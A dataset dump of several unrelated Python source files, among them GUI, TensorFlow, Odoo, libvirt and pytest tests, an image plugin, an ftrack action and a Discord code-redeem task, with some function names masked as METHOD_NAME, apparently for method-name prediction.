rdf_client_network.NetworkConnection(process_name=f"process{i}")
for i in range(15)
])
self.Click("css=result-accordion .title:contains('All connections')")
for i in range(10):
self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
self.assertEqual(self.GetCssCount("css=td:contains('process')"), 10)
# Select one paginator updates the other paginator as well as the displayed
# rows.
self.MatSelect("css=.bottom-paginator mat-select", "50")
self.WaitUntilContains("50", self.GetText, "css=.top-paginator mat-select")
self.WaitUntilContains("50", self.GetText,
"css=.bottom-paginator mat-select")
for i in range(15):
self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
self.assertEqual(self.GetCssCount("css=td:contains('process')"), 15)
self.MatSelect("css=.top-paginator mat-select", "10")
self.WaitUntilContains("10", self.GetText, "css=.top-paginator mat-select")
self.WaitUntilContains("10", self.GetText,
"css=.bottom-paginator mat-select")
for i in range(10):
self.WaitUntil(self.IsElementPresent, f"css=td:contains('process{i}')")
self.assertEqual(self.GetCssCount("css=td:contains('process')"), 10)
if __name__ == "__main__":
app.run(test_lib.main) |
298,482 | to image | import scrypted_sdk
from generator_common import createImageMediaObject
from typing import Any
try:
import pyvips
from pyvips import Image
except:
Image = None
pyvips = None
from thread import to_thread
class VipsImage(scrypted_sdk.Image):
def __init__(self, vipsImage: Image) -> None:
super().__init__()
self.vipsImage = vipsImage
self.width = vipsImage.width
self.height = vipsImage.height
async def close(self):
vips = self.vipsImage
self.vipsImage = None
if vips:
vips.invalidate()
async def toBuffer(self, options: scrypted_sdk.ImageOptions = None) -> bytearray:
vipsImage: VipsImage = await self.toImageInternal(options)
if not options or not options.get('format', None):
def format():
return memoryview(vipsImage.vipsImage.write_to_memory())
return await to_thread(format)
elif options['format'] == 'rgba':
def format():
if not vipsImage.vipsImage.bands == 3:
rgba = vipsImage.vipsImage.addalpha()
else:
rgba = vipsImage.vipsImage
return memoryview(rgba.write_to_memory())
return await to_thread(format)
elif options['format'] == 'rgb':
def format():
if vipsImage.vipsImage.bands == 4:
rgb = vipsImage.vipsImage.extract_band(0, n=vipsImage.vipsImage.bands - 1)
else:
rgb = vipsImage.vipsImage
return memoryview(rgb.write_to_memory())
return await to_thread(format)
elif options['format'] == 'gray':
if vipsImage.vipsImage.bands == 1:
def format():
return memoryview(vipsImage.vipsImage.write_to_memory())
else:
def format():
if vipsImage.vipsImage.bands == 4:
gray = vipsImage.vipsImage.extract_band(0, n=vipsImage.vipsImage.bands - 1)
else:
gray = vipsImage.vipsImage
gray = gray.colourspace("b-w")
return memoryview(gray.write_to_memory())
return await to_thread(format)
return await to_thread(lambda: vipsImage.vipsImage.write_to_buffer(f'.{options["format"]}[Q=80]'))
async def toImageInternal(self, options: scrypted_sdk.ImageOptions = None):
return await to_thread(lambda: toVipsImage(self, options))
async def METHOD_NAME(self, options: scrypted_sdk.ImageOptions = None) -> Any:
if options and options.get('format', None):
raise Exception('format can only be used with toBuffer')
newVipsImage = await self.toImageInternal(options)
return await createImageMediaObject(newVipsImage)
def toVipsImage(vipsImageWrapper: VipsImage, options: scrypted_sdk.ImageOptions = None) -> VipsImage:
vipsImage = vipsImageWrapper.vipsImage
if not vipsImage:
raise Exception('Video Frame has been invalidated')
options = options or {}
crop = options.get('crop')
if crop:
vipsImage = vipsImage.crop(int(crop['left']), int(crop['top']), int(crop['width']), int(crop['height']))
resize = options.get('resize')
if resize:
xscale = None
if resize.get('width'):
xscale = resize['width'] / vipsImage.width
scale = xscale
yscale = None
if resize.get('height'):
yscale = resize['height'] / vipsImage.height
scale = yscale
if xscale and yscale:
scale = min(yscale, xscale)
xscale = xscale or yscale
yscale = yscale or xscale
vipsImage = vipsImage.resize(xscale, vscale=yscale, kernel='linear')
return VipsImage(vipsImage)
class ImageReader(scrypted_sdk.ScryptedDeviceBase, scrypted_sdk.BufferConverter):
def __init__(self, nativeId: str):
super().__init__(nativeId)
self.fromMimeType = 'image/*'
self.toMimeType = scrypted_sdk.ScryptedMimeTypes.Image.value
async def convert(self, data: Any, fromMimeType: str, toMimeType: str, options: scrypted_sdk.MediaObjectOptions = None) -> Any:
vips = Image.new_from_buffer(data, '')
return await createImageMediaObject(VipsImage(vips))
class ImageWriter(scrypted_sdk.ScryptedDeviceBase, scrypted_sdk.BufferConverter):
def __init__(self, nativeId: str):
super().__init__(nativeId)
self.fromMimeType = scrypted_sdk.ScryptedMimeTypes.Image.value
self.toMimeType = 'image/*'
async def convert(self, data: scrypted_sdk.VideoFrame, fromMimeType: str, toMimeType: str, options: scrypted_sdk.MediaObjectOptions = None) -> Any:
return await data.toBuffer({
format: 'jpg',
})
def new_from_memory(data, width: int, height: int, bands: int):
return Image.new_from_memory(data, width, height, bands, pyvips.BandFormat.UCHAR)
def new_from_buffer(data, width: int, height: int, bands: int):
return Image.new_from_buffer(data, width, height, bands, pyvips.BandFormat.UCHAR) |
298,483 | test compute average loss default global batch | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for loss scaling utilities in tensorflow.ops.nn."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn_impl
from tensorflow.python.platform import test as test_lib
class LossUtilitiesTest(test_lib.TestCase, parameterized.TestCase):
def setUp(self):
strategy_combinations.set_virtual_cpus_to_at_least(3)
super(LossUtilitiesTest, self).setUp()
def testComputeAverageLossGlobalBatchSize(self):
per_example_loss = [1, 2, 3, 4, 5]
loss = nn_impl.compute_average_loss(per_example_loss, global_batch_size=10)
self.assertEqual(self.evaluate(loss), 1.5)
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_cpu_1_and_2
],
mode=["graph", "eager"]))
def METHOD_NAME(self, distribution):
# Without strategy - num replicas = 1
per_example_loss = constant_op.constant([2.5, 6.2, 5.])
loss = nn_impl.compute_average_loss(per_example_loss)
self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.) / 3)
# With strategy - num replicas = 2
with distribution.scope():
per_replica_losses = distribution.experimental_run_v2(
nn_impl.compute_average_loss, args=(per_example_loss,))
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.) / 3)
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_cpu_1_and_2
],
mode=["graph", "eager"]))
def testComputeAverageLossSampleWeights(self, distribution):
with distribution.scope():
# Scalar sample weight
per_replica_losses = distribution.experimental_run_v2(
nn_impl.compute_average_loss,
args=([2., 4., 6.],),
kwargs={"sample_weight": 2})
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(self.evaluate(loss), (2. + 4. + 6.) * 2. / 3)
# Per example sample weight
per_replica_losses = distribution.experimental_run_v2(
nn_impl.compute_average_loss,
args=([2., 4., 6.],),
kwargs={"sample_weight": [0.3, 0.5, 0.2]})
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(
self.evaluate(loss), (2. * 0.3 + 4. * 0.5 + 6. * 0.2) / 3)
# Time-step sample weight
per_replica_losses = distribution.experimental_run_v2(
nn_impl.compute_average_loss,
args=([[2., 0.5], [4., 1.]],),
kwargs={"sample_weight": [[0.3, 0.7], [0.2, 0.8]]})
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(
self.evaluate(loss), (2. * 0.3 + 0.5 * 0.7 + 4. * 0.2 + 1. * 0.8) / 2)
def testComputeAverageLossInvalidSampleWeights(self):
with self.assertRaisesRegex(ValueError,
"weights can not be broadcast to values"):
nn_impl.compute_average_loss([2.5, 6.2, 5.],
sample_weight=[0.2, 0.8],
global_batch_size=10)
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_cpu_1_and_2
],
mode=["graph", "eager"]))
def testComputeAverageLossDtype(self, distribution):
with distribution.scope():
per_example_loss = constant_op.constant([2., 4., 6.],
dtype=dtypes.float64)
per_replica_losses = distribution.experimental_run_v2(
nn_impl.compute_average_loss,
args=(per_example_loss,),
kwargs={"sample_weight": 2})
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertEqual(loss.dtype, dtypes.float64)
def testComputeAverageLossInvalidRank(self):
per_example_loss = constant_op.constant(2)
# Static rank
with self.assertRaisesRegex(
ValueError, "Invalid value passed for `per_example_loss`. "
"Expected a tensor with at least rank 1,"):
nn_impl.compute_average_loss(per_example_loss)
with context.graph_mode():
# Dynamic rank
per_example_loss = array_ops.placeholder(dtype=dtypes.float32)
loss = nn_impl.compute_average_loss(per_example_loss)
with self.cached_session() as sess:
with self.assertRaisesRegex(
errors.InvalidArgumentError,
"Invalid value passed for `per_example_loss`. "
"Expected a tensor with at least rank 1."):
sess.run(loss, {per_example_loss: 2})
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_cpu_1_and_2
],
mode=["graph", "eager"]))
def testComputeAverageLossInCrossReplicaContext(self, distribution):
with distribution.scope():
with self.assertRaisesRegex(
RuntimeError,
"You are calling `compute_average_loss` in cross replica context"):
nn_impl.compute_average_loss([2, 3])
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_cpu_1_and_2
],
mode=["graph", "eager"]))
def testScaleRegularizationLoss(self, distribution):
# Without strategy - num replicas = 1
reg_losses = constant_op.constant([2.5, 6.2, 5.])
loss = nn_impl.scale_regularization_loss(reg_losses)
self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.))
# With strategy - num replicas = 2
with distribution.scope():
per_replica_losses = distribution.experimental_run_v2(
nn_impl.scale_regularization_loss, args=(reg_losses,))
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.))
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_cpu_1_and_2
],
mode=["graph", "eager"]))
def testScaleRegularizationLossInCrossReplicaContext(self, distribution):
with distribution.scope():
with self.assertRaisesRegex(
RuntimeError, "You are calling `scale_regularization_loss` in "
"cross replica context"):
nn_impl.scale_regularization_loss([2, 3])
if __name__ == "__main__":
test_lib.main() |
298,484 | test send record with error | # Copyright 2020 ACSONE
# @author: Simone Orsi <simahawk@gmail.com>
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
import mock
from freezegun import freeze_time
from odoo import fields, tools
from odoo.exceptions import UserError
from .common import EDIBackendCommonComponentRegistryTestCase
from .fake_components import FakeOutputChecker, FakeOutputGenerator, FakeOutputSender
class EDIBackendTestCase(EDIBackendCommonComponentRegistryTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls._build_components(
# TODO: test all components lookup
cls,
FakeOutputGenerator,
FakeOutputSender,
FakeOutputChecker,
)
vals = {
"model": cls.partner._name,
"res_id": cls.partner.id,
}
cls.record = cls.backend.create_record("test_csv_output", vals)
def setUp(self):
super().setUp()
FakeOutputGenerator.reset_faked()
FakeOutputSender.reset_faked()
FakeOutputChecker.reset_faked()
def test_generate_record_output(self):
self.backend.with_context(fake_output="yeah!").exchange_generate(self.record)
self.assertEqual(self.record._get_file_content(), "yeah!")
def test_generate_record_output_pdf(self):
result = tools.file_open(
"result.pdf", subdir="addons/edi_oca/tests", mode="rb"
).read()
self.backend.with_context(fake_output=result).exchange_generate(self.record)
def test_send_record(self):
self.record.write({"edi_exchange_state": "output_pending"})
self.record._set_file_content("TEST %d" % self.record.id)
self.assertFalse(self.record.exchanged_on)
with freeze_time("2020-10-21 10:00:00"):
self.record.action_exchange_send()
self.assertTrue(FakeOutputSender.check_called_for(self.record))
self.assertRecordValues(self.record, [{"edi_exchange_state": "output_sent"}])
self.assertEqual(
fields.Datetime.to_string(self.record.exchanged_on), "2020-10-21 10:00:00"
)
def METHOD_NAME(self):
self.record.write({"edi_exchange_state": "output_pending"})
self.record._set_file_content("TEST %d" % self.record.id)
self.assertFalse(self.record.exchanged_on)
self.record.with_context(
test_break_send="OOPS! Something went wrong :("
).action_exchange_send()
self.assertTrue(FakeOutputSender.check_called_for(self.record))
self.assertRecordValues(
self.record,
[
{
"edi_exchange_state": "output_error_on_send",
"exchange_error": "OOPS! Something went wrong :(",
}
],
)
def test_send_invalid_direction(self):
vals = {
"model": self.partner._name,
"res_id": self.partner.id,
}
record = self.backend.create_record("test_csv_input", vals)
with mock.patch.object(type(self.backend), "_exchange_send") as mocked:
mocked.return_value = "AAA"
with self.assertRaises(UserError) as err:
record.action_exchange_send()
self.assertEqual(
err.exception.args[0],
"Record ID=%d is not meant to be sent!" % record.id,
)
mocked.assert_not_called()
def test_send_not_generated_record(self):
vals = {
"model": self.partner._name,
"res_id": self.partner.id,
}
record = self.backend.create_record("test_csv_output", vals)
with mock.patch.object(type(self.backend), "_exchange_send") as mocked:
mocked.return_value = "AAA"
with self.assertRaises(UserError) as err:
record.action_exchange_send()
self.assertEqual(
err.exception.args[0], "Record ID=%d has no file to send!" % record.id
)
mocked.assert_not_called() |
298,485 | translate ftrack items | import re
from openpype.pipeline.project_folders import (
get_project_basic_paths,
create_project_folders,
)
from openpype_modules.ftrack.lib import BaseAction, statics_icon
class CreateProjectFolders(BaseAction):
"""Action create folder structure and may create hierarchy in Ftrack.
Creation of folder structure and hierarchy in Ftrack is based on presets.
These presets are located in:
`~/pype-config/presets/tools/project_folder_structure.json`
Example of content:
```json
{
"__project_root__": {
"prod" : {},
"resources" : {
"footage": {
"plates": {},
"offline": {}
},
"audio": {},
"art_dept": {}
},
"editorial" : {},
"assets[ftrack.Library]": {
"characters[ftrack]": {},
"locations[ftrack]": {}
},
"shots[ftrack.Sequence]": {
"scripts": {},
"editorial[ftrack.Folder]": {}
}
}
}
```
Key "__project_root__" indicates root folder (or entity). Each key in
dictionary represents folder name. Value may contain another dictionary
with subfolders.
Identifier `[ftrack]` in name says that this should be also created in
Ftrack hierarchy. It is possible to specify entity type of item with "." .
If key is `assets[ftrack.Library]` then in ftrack will be created entity
with name "assets" and entity type "Library". It is expected Library entity
type exist in Ftrack.
"""
identifier = "create.project.structure"
label = "Create Project Structure"
description = "Creates folder structure"
role_list = ["Pypeclub", "Administrator", "Project Manager"]
icon = statics_icon("ftrack", "action_icons", "CreateProjectFolders.svg")
pattern_array = re.compile(r"\[.*\]")
pattern_ftrack = re.compile(r".*\[[.]*ftrack[.]*")
pattern_ent_ftrack = re.compile(r"ftrack\.[^.,\],\s,]*")
project_root_key = "__project_root__"
def discover(self, session, entities, event):
if len(entities) != 1:
return False
if entities[0].entity_type.lower() != "project":
return False
return True
def launch(self, session, entities, event):
# Get project entity
project_entity = self.get_project_from_entity(entities[0])
project_name = project_entity["full_name"]
try:
# Get paths based on presets
basic_paths = get_project_basic_paths(project_name)
if not basic_paths:
return {
"success": False,
"message": "Project structure is not set."
}
# Invoking OpenPype API to create the project folders
create_project_folders(project_name, basic_paths)
self.create_ftrack_entities(basic_paths, project_entity)
self.trigger_event(
"openpype.project.structure.created",
{"project_name": project_name}
)
except Exception as exc:
self.log.warning("Creating of structure crashed.", exc_info=True)
session.rollback()
return {
"success": False,
"message": str(exc)
}
return True
def get_ftrack_paths(self, paths_items):
all_ftrack_paths = []
for path_items in paths_items:
ftrack_path_items = []
is_ftrack = False
for item in reversed(path_items):
if item == self.project_root_key:
continue
if is_ftrack:
ftrack_path_items.append(item)
elif re.match(self.pattern_ftrack, item):
ftrack_path_items.append(item)
is_ftrack = True
ftrack_path_items = list(reversed(ftrack_path_items))
if ftrack_path_items:
all_ftrack_paths.append(ftrack_path_items)
return all_ftrack_paths
def compute_ftrack_items(self, in_list, keys):
if len(keys) == 0:
return in_list
key = keys[0]
exist = None
for index, subdict in enumerate(in_list):
if key in subdict:
exist = index
break
if exist is not None:
in_list[exist][key] = self.compute_ftrack_items(
in_list[exist][key], keys[1:]
)
else:
in_list.append({key: self.compute_ftrack_items([], keys[1:])})
return in_list
def METHOD_NAME(self, paths_items):
main = []
for path_items in paths_items:
main = self.compute_ftrack_items(main, path_items)
return main
def create_ftrack_entities(self, basic_paths, project_ent):
only_ftrack_items = self.get_ftrack_paths(basic_paths)
ftrack_paths = self.METHOD_NAME(only_ftrack_items)
for separation in ftrack_paths:
parent = project_ent
self.trigger_creation(separation, parent)
def trigger_creation(self, separation, parent):
for item, subvalues in separation.items():
matches = re.findall(self.pattern_array, item)
ent_type = "Folder"
if len(matches) == 0:
name = item
else:
match = matches[0]
name = item.replace(match, "")
ent_type_match = re.findall(self.pattern_ent_ftrack, match)
if len(ent_type_match) > 0:
ent_type_split = ent_type_match[0].split(".")
if len(ent_type_split) == 2:
ent_type = ent_type_split[1]
new_parent = self.create_ftrack_entity(name, ent_type, parent)
if subvalues:
for subvalue in subvalues:
self.trigger_creation(subvalue, new_parent)
def create_ftrack_entity(self, name, ent_type, parent):
for children in parent["children"]:
if children["name"] == name:
return children
data = {
"name": name,
"parent_id": parent["id"]
}
if parent.entity_type.lower() == "project":
data["project_id"] = parent["id"]
else:
data["project_id"] = parent["project"]["id"]
existing_entity = self.session.query((
"TypedContext where name is \"{}\" and "
"parent_id is \"{}\" and project_id is \"{}\""
).format(name, data["parent_id"], data["project_id"])).first()
if existing_entity:
return existing_entity
new_ent = self.session.create(ent_type, data)
self.session.commit()
return new_ent
def register(session):
CreateProjectFolders(session).register() |
298,486 | redeem code | import asyncio
from typing import List
import discord
import genshin
import sentry_sdk
from apps.db.tables.hoyo_account import HoyoAccount
from apps.text_map import text_map
from dev.base_ui import get_error_handle_embed
from dev.enum import GameType
from dev.exceptions import AccountNotFound
from dev.models import BotModel, DefaultEmbed
from utils import log
from utils.general import get_dc_user
class AutoRedeem:
def __init__(self, bot: BotModel):
"""
Initializes the AutoRedeem class.
Args:
bot (BotModel): The bot instance.
"""
self.bot = bot
self._total = 0
self._success = 0
async def exec(self) -> None:
"""Execute the AutoRedeem process.
This function retrieves all codes from the database and processes them for all users.
If no codes are found, the function will exit early.
Raises:
Exception: If an error occurs during the process.
Returns:
None
"""
try:
log.info("[AutoRedeem] Starting")
codes = await self.bot.db.codes.get_all()
if not codes:
return log.info("[AutoRedeem] No codes found, skipping")
users = await self._get_users()
await self._process_users(users, codes)
except Exception as e: # skipcq: PYL-W0703
log.exception(f"[AutoRedeem] {e}")
sentry_sdk.capture_exception(e)
else:
log.info(f"[AutoRedeem] Redeemed for {self._success}/{self._total} users")
finally:
log.info("[AutoRedeem] Finished")
async def _get_users(self) -> List[HoyoAccount]:
"""Retrieve all users with auto-redeem enabled and their associated accounts.
This function queries the database for all users with auto-redeem enabled and retrieves
all of their associated accounts for the Genshin Impact game type. If an account is not found
for a user, the user is skipped.
Returns:
A list of HoyoAccount objects representing all accounts associated with users with
auto-redeem enabled.
Raises:
None
"""
result: List[HoyoAccount] = []
users = await self.bot.pool.fetch(
"SELECT user_id FROM user_settings WHERE auto_redeem = true"
)
for user in users:
try:
accounts = await self.bot.db.users.get_all_of_user(
user["user_id"], GameType.GENSHIN
)
except AccountNotFound:
continue
else:
result.extend(accounts)
self._total += 1
return result
async def _process_users(self, users: List[HoyoAccount], codes: List[str]) -> None:
"""Process the given codes for the given users.
This function attempts to redeem the given codes for each user in the list of users.
If a code is successfully redeemed, an embed is created and sent to the user via Discord.
If an error occurs during the process, the error is logged and the exception is captured by Sentry.
Args:
users: A list of HoyoAccount objects representing the users to process.
codes: A list of strings representing the codes to redeem.
Returns:
None
Raises:
None
"""
for user in users:
try:
dc_user = await get_dc_user(self.bot, user.user_id)
embeds = await self._redeem_codes(user, codes, dc_user)
except Exception as e: # skipcq: PYL-W0703
log.exception(f"[AutoRedeem] {e}")
sentry_sdk.capture_exception(e)
else:
await self.notify_user(dc_user, embeds)
self._success += 1
async def _redeem_codes(
self, account: HoyoAccount, codes: List[str], discord_user: discord.User
) -> List[discord.Embed]:
"""
Redeems all codes for a given user account.
Args:
account (HoyoAccount): The user account to redeem codes for.
codes (List[str]): The list of codes to redeem.
discord_user (discord.User): The Discord user to notify.
Returns:
List[discord.Embed]: The list of embeds to send to the user.
"""
embeds: List[discord.Embed] = []
for code in codes:
log.info(f"[AutoRedeem] Redeeming {code} for {account.uid}")
redeemed = await self.bot.db.redeemed.check(account.uid, code)
if redeemed:
continue
embed = await self.METHOD_NAME(account, code, discord_user)
await self.bot.db.redeemed.insert(account.uid, code)
embeds.append(embed)
await asyncio.sleep(10.0)
return embeds
@staticmethod
async def METHOD_NAME(
account: HoyoAccount, code: str, user: discord.User
) -> discord.Embed:
"""
Redeems a single code for a given user account.
Args:
account (HoyoAccount): The user account to redeem the code for.
code (str): The code to redeem.
user (discord.User): The Discord user to notify.
Returns:
discord.Embed: The embed to send to the user.
"""
client = await account.client
lang = (await account.settings).lang or "en-US"
try:
await client.redeem_code(code, account.uid, game=genshin.Game.GENSHIN)
except Exception as e: # skipcq: PYL-W0703
embed = get_error_handle_embed(user, e, lang)
else:
embed = DefaultEmbed(
text_map.get(109, lang),
)
if embed.description is None:
embed.description = ""
embed.description += f"\n\n{text_map.get(108, lang)}: **{code}**"
embed.set_footer(text=text_map.get(126, lang))
return embed
@staticmethod
async def notify_user(user: discord.User, embeds: List[discord.Embed]) -> None:
"""
Notifies a user of the redeemed codes.
Args:
user (discord.User): The Discord user to notify.
embeds (List[discord.Embed]): The list of embeds to send to the user.
"""
if not embeds:
return
try:
await user.send(embeds=embeds)
except discord.Forbidden:
pass |
298,487 | result | import os
import shutil
import unittest
import numpy as np
from tensorflow import keras
from neural_compressor import mix_precision
from neural_compressor.config import MixedPrecisionConfig
from neural_compressor.data import DataLoader, Datasets
def build_sequential_model():
# Create Keras model
model = keras.Sequential(
[
keras.layers.InputLayer(input_shape=(28, 28), name="input"),
keras.layers.Reshape(target_shape=(28, 28, 1)),
keras.layers.Conv2D(filters=12, kernel_size=(3, 3), activation="relu"),
keras.layers.Conv2D(filters=12, kernel_size=(3, 3), activation="relu"),
keras.layers.Conv2D(filters=12, kernel_size=(3, 3), activation="relu"),
keras.layers.Conv2D(filters=12, kernel_size=(3, 3), activation="relu"),
keras.layers.Conv2D(filters=12, kernel_size=(3, 3), activation="relu"),
keras.layers.MaxPooling2D(pool_size=(2, 2)),
keras.layers.Flatten(),
keras.layers.Dense(10, activation="softmax", name="output"),
]
)
# Print model architecture
model.summary()
# Compile model with optimizer
opt = keras.optimizers.Adam(learning_rate=0.01)
model.compile(optimizer=opt, loss="sparse_categorical_crossentropy", metrics=["accuracy"])
model.save("./models/saved_model")
return
# Define a customized Metric function
from neural_compressor.metric import BaseMetric
class MyMetric(BaseMetric):
def __init__(self, *args):
self.pred_list = []
self.label_list = []
self.samples = 0
def update(self, predict, label):
self.pred_list.extend(np.argmax(predict, axis=1))
self.label_list.extend(label)
self.samples += len(label)
def reset(self):
self.pred_list = []
self.label_list = []
self.samples = 0
def METHOD_NAME(self):
correct_num = np.sum(np.array(self.pred_list) == np.array(self.label_list))
return correct_num / self.samples
class MyMetric_keras(MyMetric):
def __init__(self, *args):
super(MyMetric_keras, self).__init__(*args)
class TestMixedPrecisionWithKerasModel(unittest.TestCase):
@classmethod
def setUpClass(self):
os.environ["FORCE_FP16"] = "1"
os.environ["FORCE_BF16"] = "1"
build_sequential_model()
@classmethod
def tearDownClass(self):
del os.environ["FORCE_FP16"]
del os.environ["FORCE_BF16"]
shutil.rmtree("./models", ignore_errors=True)
shutil.rmtree("./nc_workspace", ignore_errors=True)
def test_mixed_precision_with_keras_model(self):
# use dummy dataset for UT test
dataset = Datasets("tensorflow")["dummy"](shape=(10, 28, 28), low=0.0, high=1.0, label=True)
dataloader = DataLoader(framework="tensorflow", dataset=dataset)
config = MixedPrecisionConfig()
q_model = mix_precision.fit(
model="./models/saved_model", conf=config, eval_dataloader=dataloader, eval_metric=MyMetric()
)
# Optional, run quantized model
import tensorflow as tf
with tf.compat.v1.Graph().as_default(), tf.compat.v1.Session() as sess:
tf.compat.v1.import_graph_def(q_model.graph_def, name="")
out = sess.run(["Identity:0"], feed_dict={"input:0": dataset.dataset})
print("Inference is done.")
found_cast = False
for i in q_model.graph_def.node:
if i.op == "Cast":
found_cast = True
break
self.assertEqual(found_cast, True)
def test_mixed_precision_with_keras_adaptor(self):
# use dummy dataset for UT test
dataset = Datasets("tensorflow")["dummy"](shape=(10, 28, 28), low=0.0, high=1.0, label=True)
dataloader = DataLoader(framework="tensorflow", dataset=dataset)
# add backend='itex' to run on keras adaptor
config = MixedPrecisionConfig(backend="itex")
bf16_model = mix_precision.fit(
model="./models/saved_model", config=config, eval_dataloader=dataloader, eval_metric=MyMetric_keras()
)
bf16_policy = keras.mixed_precision.Policy("mixed_bfloat16")
# bf16_model.model is an obj of tf.keras.Model
model_policy = bf16_model.model.dtype_policy
conv2d_layer_policy = bf16_model.model.get_layer("conv2d").dtype_policy
self.assertEqual(model_policy.compute_dtype, bf16_policy.compute_dtype)
self.assertEqual(conv2d_layer_policy.compute_dtype, bf16_policy.compute_dtype)
if __name__ == "__main__":
unittest.main() |
298,488 | patch sleep | import time
from collections.abc import (
Callable,
Iterable,
Mapping,
MutableMapping,
)
from pathlib import Path
from typing import (
Any,
Optional,
)
from unittest.mock import create_autospec
import httpretty as _httpretty
import pytest
from pydantic import BaseModel
from pydantic.error_wrappers import ValidationError
from reconcile.gql_definitions.fragments.vault_secret import VaultSecret
from reconcile.test.fixtures import Fixtures
from reconcile.utils.gql import GqlApi
from reconcile.utils.models import data_default_none
from reconcile.utils.state import State
@pytest.fixture
def METHOD_NAME(mocker):
yield mocker.patch.object(time, "sleep")
@pytest.fixture()
def httpretty():
with _httpretty.enabled(allow_net_connect=False):
_httpretty.reset()
yield _httpretty
@pytest.fixture
def secret_reader(mocker) -> None:
mock_secretreader = mocker.patch(
"reconcile.utils.secret_reader.SecretReader", autospec=True
)
mock_secretreader.read.return_value = "secret"
mock_secretreader.read_secret.return_value = "secret"
return mock_secretreader
@pytest.fixture
def s3_state_builder() -> Callable[[Mapping], State]:
"""
Example input data:
{
"get": {
# This maps data being returned by get
"path/to/item": {
"some_key": "content",
"other_content": "content",
},
"other/path": {
"other": "data",
},
},
"ls": [
"/path/item1",
"/path/item2",
]
}
"""
def builder(data: Mapping) -> State:
def get(key: str, *args) -> dict:
try:
return data["get"][key]
except KeyError:
if args:
return args[0]
raise
def __getitem__(self, key: str) -> dict:
return get(key)
state = create_autospec(spec=State)
state.get = get
state.__getitem__ = __getitem__
state.ls.side_effect = [data.get("ls", [])]
return state
return builder
@pytest.fixture
def vault_secret():
return VaultSecret(
path="path/test",
field="key",
format=None,
version=None,
)
@pytest.fixture
def data_factory() -> (
Callable[
[type[BaseModel], Optional[MutableMapping[str, Any]]],
MutableMapping[str, Any],
]
):
"""Set default values to None."""
def _data_factory(
klass: type[BaseModel], data: Optional[MutableMapping[str, Any]] = None
) -> MutableMapping[str, Any]:
return data_default_none(klass, data or {})
return _data_factory
class GQLClassFactoryError(Exception):
pass
@pytest.fixture
def gql_class_factory() -> (
Callable[
[type[BaseModel], Optional[MutableMapping[str, Any]]],
BaseModel,
]
):
"""Create a GQL class from a fixture and set default values to None."""
def _gql_class_factory(
klass: type[BaseModel], data: Optional[MutableMapping[str, Any]] = None
) -> BaseModel:
try:
return klass(**data_default_none(klass, data or {}))
except ValidationError as e:
msg = "[gql_class_factory] Your given data does not match the class ...\n"
msg += "\n".join([str(m) for m in list(e.raw_errors)])
raise GQLClassFactoryError(msg) from e
return _gql_class_factory
@pytest.fixture
def gql_api_builder() -> Callable[[Optional[Mapping]], GqlApi]:
def builder(data: Optional[Mapping] = None) -> GqlApi:
gql_api = create_autospec(GqlApi)
gql_api.query.return_value = data
return gql_api
return builder
@pytest.fixture
def set_httpretty_responses_based_on_fixture(httpretty: _httpretty) -> Callable:
"""Create httpretty responses based fixture files."""
def _(url: str, fx: Fixtures, paths: Iterable[str]) -> None:
for path in paths:
for method in ["get", "post", "put", "patch", "delete"]:
method_file = Path(fx.path(path)) / f"{method}.json"
if method_file.exists():
httpretty.register_uri(
getattr(httpretty, method.upper()),
f"{url}/{path}",
body=method_file.read_text(),
content_type="text/json",
)
return _ |
298,489 | check freeze | import aexpect
from virttest import virsh
from virttest.libvirt_xml import vm_xml
from virttest.utils_test import libvirt
def run(test, params, env):
"""
This test virsh domfsfreeze and domfsthaw commands and their options.
1) Start a guest with/without guest agent configured;
2) Freeze the guest file systems with domfsfreeze;
3) Create a file on guest to see command hang;
4) Thaw the guest file systems with domfsthaw;
5) Check the file is already created;
6) Retouch the file the ensure guest file system are not frozen;
7) Cleanup test environment.
"""
def METHOD_NAME(session):
"""
Check whether file system has been frozen by touch a test file
and see if command will hang.
:param session: Guest session to be tested.
"""
try:
output = session.cmd_output('touch freeze_test',
timeout=10)
test.fail("Failed to freeze file system. "
"Create file succeeded:\n%s" % output)
except aexpect.ShellTimeoutError:
pass
def check_thaw(session):
"""
Check whether file system has been thawed by check a test file
prohibited from creation when frozen created and successfully touch
the file again.
:param session: Guest session to be tested.
"""
status, output = session.cmd_status_output('ls freeze_test')
if status:
test.fail("Failed to thaw file system. "
"Find created file failed:\n%s" % output)
try:
output = session.cmd_output('touch freeze_test', timeout=10)
